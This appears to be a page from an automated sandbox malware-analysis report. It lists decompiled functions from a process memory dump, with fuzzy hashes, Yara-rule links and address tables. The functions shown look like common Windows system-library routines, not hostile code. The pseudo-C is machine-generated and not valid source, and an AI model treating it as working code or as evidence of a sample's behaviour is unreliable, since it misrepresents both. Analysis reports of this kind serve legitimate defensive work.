0x00f96dbb
0x00f96d90
0x00f96d69
0x00f96d46
0x00f96dc6

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60421de704e28d33a5e6182ff0062ee62ac88f1ec8f393167a66434c384ef845
Instruction ID: 35448a94d55fd96beaf57d04515edd16fcf1d1061a228cb69df305497f35835e
Opcode Fuzzy Hash: 60421de704e28d33a5e6182ff0062ee62ac88f1ec8f393167a66434c384ef845
Instruction Fuzzy Hash: D021F572A043449BDB21EF28C944B6BB7ECAF817A0F040467FD50C7252D738C909E6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00FE070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				void* _v11;
				signed int _v12;
				void* _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E00FE07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E00FDAFDE( &_v8,  &_v12, 0x4000,  *_t9,  *_t7);
					E00FE1293(_t38, _v28, _t60);
					if(E00F37D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E00FD14FB(_t38,  *_t21, _v8, _v12, 0xd);
					}
				}
				return  ~_t60;
			}

0x00fe071b
0x00fe0724
0x00fe0734
0x00fe0738
0x00fe074b
0x00fe0753
0x00fe0759
0x00fe075d
0x00fe0779
0x00fe077d
0x00fe0789
0x00fe0795
0x00fe07a7
0x00fe0797
0x00fe07a0
0x00fe07a0
0x00fe07af
0x00fe07c4
0x00fe07cd
0x00fe07cd
0x00fe07af
0x00fe07dc

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 64f46a837ae826e8ee9a4b0ae7fbaeacfce35318ebfdfc4eefe9068db8592535
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 02214636604240AFC705DF19CC80B6ABBA6FFC1320F048669F9948B382DB74EC49DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F3AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00F3AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E00F37D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E00F37D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E00F37D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E00F37D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E00F97794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x00f3ae78
0x00f3ae7c
0x00f3ae7e
0x00f3ae81
0x00f3ae86
0x00f3ae8d
0x00f82691
0x00f3ae93
0x00f3ae93
0x00f3ae93
0x00f3ae98
0x00f3ae9d
0x00f826a2
0x00f826b4
0x00f826a4
0x00f826ad
0x00f826ad
0x00f826b9
0x00000000
0x00f826bb
0x00000000
0x00f826bb
0x00f3aea3
0x00f3aea3
0x00f3aea3
0x00f3aeaa
0x00f826c0
0x00f826c9
0x00f826c9
0x00f3aeb3
0x00f826d4
0x00f826e1
0x00000000
0x00000000
0x00f826e7
0x00f826ee
0x00f826f0
0x00f826f9
0x00f826f9
0x00f82702
0x00f82708
0x00f82708
0x00f8270b
0x00f8270f
0x00f82711
0x00f82711
0x00f82725
0x00f82725
0x00000000
0x00f3aeb9
0x00f3aeb9
0x00f3aebf
0x00f3aebf
0x00f3aeb3

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 4886477cc8f73fbf7ad28f7543815af0ad3b6f64f9f575fa86e83f3054b7430f
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 20210872A05685DFDB25EB6AC944B6577E8EF44370F1900A0ED048B792E738EC80F791

Uniqueness

Uniqueness Score: -1.00%

Function 00F97794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00F97794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1007b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E00F5F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E00F37D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E00F59AE0();
					_t24 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x00f97799
0x00f9779a
0x00f9779b
0x00f977a3
0x00f977ab
0x00f977ae
0x00f977b1
0x00f977b1
0x00f977bf
0x00f977c4
0x00f977c8
0x00f977ce
0x00f977d4
0x00f977e0
0x00f977e0
0x00f977d6
0x00f977d6
0x00f977de
0x00000000
0x00000000
0x00f977de
0x00f977e5
0x00f977f0
0x00f977f3
0x00f977f6
0x00f977fd
0x00f97800
0x00f9780c
0x00f97818
0x00f9782b
0x00f9781a
0x00f97823
0x00f97823
0x00f97830
0x00f97831
0x00f97838
0x00f9783d
0x00f9783e
0x00f9784f
0x00f9784f
0x00f9785a

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5720fa62336a124e8874f25d837853d9caa356bf89d01de29764feb33a1b4130
Instruction ID: b154babc3229e7a9c97ec34d649b67019c155669fef144ea5a7b7673022a7d3b
Opcode Fuzzy Hash: 5720fa62336a124e8874f25d837853d9caa356bf89d01de29764feb33a1b4130
Instruction Fuzzy Hash: 9D21A172914704ABCB25EF69DC84E6BB7A8EF48350F10056DFA0AC7750D638E900DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F4FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F4FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E00F276E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x00f4fd9b
0x00f4fda0
0x00f4fda1
0x00f4fdab
0x00f4fdad
0x00f4fdb0
0x00f4fdb8
0x00f4fe0f
0x00f4fde6
0x00f4fde9
0x00f4fdec
0x00f8c0c0
0x00f4fdfe
0x00f4fe06
0x00f4fe06
0x00f8c0c8
0x00f4fe2d
0x00f4fe2d
0x00000000
0x00f4fe2d
0x00f8c0d1
0x00f8c0e0
0x00f8c0e5
0x00f8c0e5
0x00f8c0e8
0x00000000
0x00f8c0e8
0x00f4fdf4
0x00000000
0x00000000
0x00f4fdf6
0x00f4fdfa
0x00f4fe1a
0x00f4fe1f
0x00f4fe1f
0x00f4fdfc
0x00000000
0x00f4fdfc
0x00f4fdcc
0x00f4fdd0
0x00f4fe26
0x00000000
0x00f4fe26
0x00f4fdd8
0x00f4fddb
0x00f4fddd
0x00f4fde0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 3fb1523aee848694c2db17a401b87a35bae42d73ae699b0a004cdf53a88c9e33
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 3E217972A00A44DFC731CF09C640E66FBF5EB94B21F25817EE94987A21E734AC04EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F19240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00F19240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0xfef708);
				E00F6D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E00F595D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E00F595D0();
				_t33 =  *0x10084c4; // 0x0
				L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x10084c4; // 0x0
				L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x10084c4; // 0x0
				E00F32280(L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x10086b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E00F595D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E00F595D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E00F19325();
					_t50 =  *0x10084c4; // 0x0
					return E00F6D0D1(L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x00f19240
0x00f19242
0x00f19247
0x00f1924c
0x00f1924e
0x00f19255
0x00f19257
0x00f1925a
0x00f1925f
0x00f1925f
0x00f19266
0x00f19271
0x00f19276
0x00f19279
0x00f1927e
0x00f19295
0x00f1929a
0x00f192b1
0x00f192b6
0x00f192d7
0x00f192dc
0x00f192e0
0x00f192e6
0x00f192e8
0x00f192ee
0x00f19332
0x00f19333
0x00f19337
0x00f19338
0x00f1933a
0x00f1933a
0x00f1933d
0x00f19342
0x00f19342
0x00f19345
0x00f19349
0x00f1934e
0x00f19352
0x00f19357
0x00f192f4
0x00f192f4
0x00f192f6
0x00f192f9
0x00f19300
0x00f19306
0x00f19324
0x00f19324

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 90202efb085432c93b493289fad0d21bc33f6b3ebcd23b84ae830f8e11e94e96
Instruction ID: 742a713a0eff886cba2e6f511ee066202b9fafb4ee2abcda5097e15a526100c6
Opcode Fuzzy Hash: 90202efb085432c93b493289fad0d21bc33f6b3ebcd23b84ae830f8e11e94e96
Instruction Fuzzy Hash: A6218771441640EFC722EF28CE11F5AB7F9BF08314F05456CE04A866A2CB79EA81EB84

Uniqueness

Uniqueness Score: -1.00%

Function 00F4B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00F4B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E00F32280(_t12, 0x1008608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E00F500C2(0x1008608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x00f4b395
0x00f4b3a2
0x00f4b3a5
0x00f4b3aa
0x00f4b3b2
0x00f4b3ba
0x00f4b3bd
0x00f4b3c0
0x00f4b3c4
0x00f4b3c9
0x00f8a3e9
0x00f8a3ed
0x00f8a3f0
0x00f8a3ff
0x00f8a403
0x00f8a409
0x00000000
0x00000000
0x00f8a40b
0x00f8a40b
0x00f8a40f
0x00f8a415
0x00f8a423
0x00f8a423
0x00f8a415
0x00f4b3d1
0x00f4b3e8
0x00f4b3e8
0x00f4b3d9

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 245fda1a423f5b2a08dfb7ff9230788385118443913d9d49154526e5399b4328
Instruction ID: a9dde09b26cede5e4af76573f3fe5cb508ab7b69ed9f4aa4c32d2721dcbd62d4
Opcode Fuzzy Hash: 245fda1a423f5b2a08dfb7ff9230788385118443913d9d49154526e5399b4328
Instruction Fuzzy Hash: 44114833B051109BDB299E558D81A6B766AFBC9730F25413AED1687381CA359C02E791

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00FA4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0xff08d0);
				E00F6D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E00FA41E8(__ebx, __edi, __ecx, _t39);
				E00F2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x10087e4;
					_t18 =  *0x10087e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1005cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x10087e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x10087e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L00F17055(_t31 + 0xfffffff8);
								_t24 =  *0x10087e0; // 0x0
								_t18 = _t24 - 1;
								 *0x10087e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1005cd0;
				if( *0x1005cd0 <= 0) {
					L00F17055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x10087e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x10087e8 = _t30;
						 *0x10087e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E00F6D0D1(L00FA4320());
			}

0x00fa4257
0x00fa4257
0x00fa4257
0x00fa4259
0x00fa425e
0x00fa4263
0x00fa4265
0x00fa4273
0x00fa4278
0x00fa427c
0x00fa427f
0x00fa4281
0x00fa4287
0x00fa42d7
0x00fa42d7
0x00fa42da
0x00fa428d
0x00fa428d
0x00fa428f
0x00fa4292
0x00fa4297
0x00fa429c
0x00fa42a0
0x00fa42a6
0x00fa42a8
0x00fa42ae
0x00fa42b3
0x00000000
0x00fa42ba
0x00fa42ba
0x00fa42bf
0x00fa42c5
0x00fa42ca
0x00fa42cf
0x00fa42d0
0x00000000
0x00fa42d0
0x00fa42b3
0x00000000
0x00fa42a6
0x00fa429c
0x00fa42dc
0x00fa42dc
0x00fa42e3
0x00fa4309
0x00fa42e5
0x00fa42e5
0x00fa42e8
0x00fa42ee
0x00fa42f0
0x00000000
0x00fa42f2
0x00fa42f2
0x00fa42f4
0x00fa42f7
0x00fa42f9
0x00fa4300
0x00fa4300
0x00fa42f0
0x00fa430e
0x00fa431f

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f739c3efa6b660da9214d10f31a1c72b23c9253f94d17df3bc9ea8d99e01a5
Instruction ID: 799250a646f2d696a679187f383257d45e84ec6b96ff124cbfc4945616e473fe
Opcode Fuzzy Hash: d6f739c3efa6b660da9214d10f31a1c72b23c9253f94d17df3bc9ea8d99e01a5
Instruction Fuzzy Hash: CB213EB0901701DFCB26DF64D400A5477F1FBCA324F20C2AAE1598B299D77AE891EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F946A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F946A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E00F5F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E00F4D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L00F377F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x00f946b7
0x00f946ba
0x00f946c5
0x00f946c8
0x00f946d0
0x00f946d4
0x00f946e6
0x00f946e9
0x00f946f4
0x00f946ff
0x00f94705
0x00f94706
0x00f9470c
0x00f94713
0x00f9471b
0x00f94723
0x00f94725
0x00f946d6
0x00f946d9
0x00f946db
0x00f946db
0x00f94732

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 8cdc7923db5456430ae0476bdcc8ceb830616ef4fa66eb58cbee37797de44ec5
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: F8112572904208BBCB019F5CD881CBEFBB9EF95310F1080AAF944C7351DA359D55E3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00F42397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00F42397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x100848c != 0) {
					L00F3FAD0(0x1008610);
					if( *0x100848c == 0) {
						E00F3FA00(0x1008610, _t19, _t27, 0x1008610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E00F42581(0x1008610, 0xef50a0, _t26, _t27, _t28);
						E00F3FA00(0x1008610, 0xef50a0, _t27, 0x1008610);
					}
				} else {
					L1:
					_t11 =  *0x1008614; // 0x0
					if(_t11 == 0) {
						_t11 = E00F54886(0xef1088, 1, 0x1008614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E00F42581(0x1008610, (_t11 << 4) + 0xef5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x00f423b0
0x00f423b6
0x00f42409
0x00f42415
0x00f85ae9
0x00000000
0x00f4241b
0x00f4241b
0x00f4241d
0x00f42427
0x00f4242e
0x00f42430
0x00f42430
0x00f423b8
0x00f423b8
0x00f423b8
0x00f423bf
0x00f423fc
0x00f423fc
0x00f423c1
0x00f423c3
0x00f423d0
0x00f423d8
0x00f423d8
0x00f423dc
0x00f423de
0x00f423e1
0x00f423e1
0x00f423ec

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c85108835d97aa5a349de33d84fc9c9690c6744245d20e6aea268ee3d7cba69
Instruction ID: 756543e73a20e0f33f849a41d17033bf239e7d979e9e1afdae42430a6f211b21
Opcode Fuzzy Hash: 1c85108835d97aa5a349de33d84fc9c9690c6744245d20e6aea268ee3d7cba69
Instruction Fuzzy Hash: A9112F32E0070157D771AA299C85B25BA98FB90730F59843AFF45A7191CDBCDC44B754

Uniqueness

Uniqueness Score: -1.00%

Function 00F1C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00F1C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x100d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E00F2EEF0(0x10070a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E00F9F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E00F2EB70(_t29, 0x10070a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E00F5B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E00F9F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x10070c0; // 0x0
					while(_t38 != 0x10070c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x100b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x00f1c96a
0x00f1c974
0x00f1c988
0x00f1c98a
0x00f87c9d
0x00f87c9f
0x00f87ca4
0x00f87cae
0x00f87cf0
0x00f87cf5
0x00f87cfa
0x00f1c992
0x00f1c996
0x00f1c997
0x00f1c998
0x00f1c9a3
0x00f1c9a3
0x00f87cb0
0x00f87cb7
0x00f87cbb
0x00000000
